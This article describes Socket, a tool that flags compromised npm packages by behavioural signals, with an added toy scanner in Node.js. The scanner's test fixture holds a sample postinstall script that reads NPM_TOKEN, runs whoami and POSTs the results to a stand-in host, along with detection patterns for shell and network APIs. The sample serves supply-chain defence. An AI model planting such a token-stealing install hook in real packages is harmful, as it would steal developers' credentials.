December 9, 2023

A group of software package maintainers has built Socket, a tool for defending applications that depend on open-source JavaScript libraries. Rather than reacting to published advisories, Socket takes a proactive approach to open-source software (OSS) supply chain attacks.

Securing open-source software is becoming increasingly challenging, especially since every direct dependency can pull in dozens or hundreds of transitive dependencies. The security industry is mostly focused on vulnerabilities that have already been discovered: there are many CVE scanners that monitor applications for known vulnerabilities, but a freshly compromised package has no CVE yet.


Socket has been designed with the assumption that all open-source packages may be malicious. Instead of searching for known vulnerabilities, it tries to detect signs of compromised packages.

Socket uses “deep package inspection” to characterize the behavior of a software package. It analyses both the package code and maintainer behavior to detect the tell-tale signs of a supply chain attack. It runs static analysis on a JavaScript package and all of its dependencies, looking for risk markers such as install scripts, obfuscated code, high-entropy strings, or use of privileged APIs such as the shell, the network, the filesystem, eval(), and environment variables. These markers are signals, not proof: a legitimate native module may well have an install script and read the filesystem, so each finding is weighed rather than treated as a verdict on its own.

Socket has a total of 70 detection markers in five categories: supply chain risk, quality, maintenance, known vulnerabilities, and license. These issues feed as signals into a supply chain risk formula that determines whether an alert is raised.
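To make the two preceding paragraphs concrete, here is an added example (written for this article, not Socket's own code) of a toy deep-package-inspection pass in Node.js. It scans a constructed npm package for the risk markers listed above (install hooks in package.json, privileged API use, obfuscated identifiers, and high-entropy string literals) and feeds the findings into an assumed weighted risk formula. The regexes, thresholds, weights, and the sample packages are all illustrative assumptions; a production scanner would parse an AST rather than grep source text.

```javascript
// Added example, not Socket's code: a toy "deep package inspection" pass
// over an npm package. Regexes, thresholds and weights are assumptions
// made for illustration; the sample packages below are constructed.

const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Privileged API markers (deliberately simple; a real scanner walks the AST).
const PRIVILEGED_APIS = [
  { name: "shell",       re: /\bchild_process\b|\b(?:exec|spawn)(?:Sync)?\s*\(/ },
  { name: "network",     re: /\brequire\(\s*['"](?:https?|net|dns|dgram|tls)['"]\s*\)|\bfetch\s*\(/ },
  { name: "filesystem",  re: /\brequire\(\s*['"]fs(?:\/promises)?['"]\s*\)/ },
  { name: "eval",        re: /\beval\s*\(|\bnew\s+Function\s*\(/ },
  { name: "environment", re: /\bprocess\.env\b/ },
];
// Typical obfuscator output: _0x-prefixed identifiers and \x hex escapes.
const OBFUSCATION_RE = /\b_0x[0-9a-f]{4,}\b|\\x[0-9a-f]{2}/i;
const MIN_BLOB_LEN = 20;        // assumed: ignore short literals
const ENTROPY_THRESHOLD = 4.5;  // assumed: bits/char; random-looking blobs score close to 5
const STRING_LITERAL_RE = /(["'`])((?:\\.|(?!\1)[^\\\n])*)\1/g;

// Shannon entropy of a string in bits per character.
function shannonEntropy(s) {
  if (s.length === 0) return 0;
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Run the static checks over package.json scripts and every source file.
function inspectPackage(pkg) {
  const alerts = [];
  const scripts = (pkg.manifest && pkg.manifest.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) {
      alerts.push({ type: "install-script", file: "package.json", detail: `${hook}: ${scripts[hook]}` });
    }
  }
  for (const [file, src] of Object.entries(pkg.files || {})) {
    for (const api of PRIVILEGED_APIS) {
      const m = src.match(api.re);
      if (m) alerts.push({ type: `privileged-api:${api.name}`, file, detail: m[0] });
    }
    const obf = src.match(OBFUSCATION_RE);
    if (obf) alerts.push({ type: "obfuscated-code", file, detail: obf[0] });
    for (const m of src.matchAll(STRING_LITERAL_RE)) {
      const lit = m[2];
      const h = shannonEntropy(lit);
      if (lit.length >= MIN_BLOB_LEN && h > ENTROPY_THRESHOLD) {
        alerts.push({ type: "high-entropy-string", file, detail: `${h.toFixed(2)} bits/char: ${lit}` });
      }
    }
  }
  return alerts;
}

// Assumed risk formula: weighted sum of signals compared against a fixed threshold.
const WEIGHTS = { "install-script": 3, "obfuscated-code": 3, "high-entropy-string": 2 };
const ALERT_THRESHOLD = 5;
function riskVerdict(alerts) {
  let score = 0;
  for (const a of alerts) {
    score += a.type.startsWith("privileged-api:") ? 2 : (WEIGHTS[a.type] || 1);
  }
  return { score, alert: score >= ALERT_THRESHOLD };
}

// Constructed sample packages (not real npm packages).
const SUSPICIOUS_PACKAGE = {
  manifest: { name: "left-pad-helper", version: "1.0.3",
              scripts: { postinstall: "node setup.js", test: "node test.js" } },
  files: {
    "index.js": "module.exports = (s, n) => s.padStart(n);\n",
    "setup.js": [
      "const cp = require('child_process');",
      "const token = process.env.NPM_TOKEN;",
      "const _0x2f1c = 'kx9Qw2Lm7Zt4Rv8Hn3Jp6Yb1Cd5Fg0Sa';",
      "const who = cp.execSync('whoami').toString();",
      "fetch('https://example.invalid/c', { method: 'POST', body: token + who + _0x2f1c });",
    ].join("\n"),
  },
};
const BENIGN_PACKAGE = {
  manifest: { name: "left-pad-helper", version: "1.0.2", scripts: { test: "node test.js" } },
  files: { "index.js": "module.exports = (s, n) => s.padStart(n);\n" },
};

for (const [label, pkg] of [["suspicious", SUSPICIOUS_PACKAGE], ["benign", BENIGN_PACKAGE]]) {
  const alerts = inspectPackage(pkg);
  console.log(label, riskVerdict(alerts), alerts.map((a) => `${a.file}: ${a.type} (${a.detail})`));
}
```

Running it with `node inspect.js` prints the benign release with no findings and the suspicious release with six: the postinstall hook, shell, network and environment access, an `_0x`-style identifier, and a 32-character literal at 5.0 bits/char. The contrast between the two versions is the point: neither has a CVE, and only behavioral markers separate them.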


The tool is available as a paid app for GitHub and also has a free version with limited functionality. In the future, the team will be adding more risk detection techniques as well as advanced reporting features. They will also add support for more languages (Java, Go, Python) and integrations with other platforms (GitLab, Bitbucket).
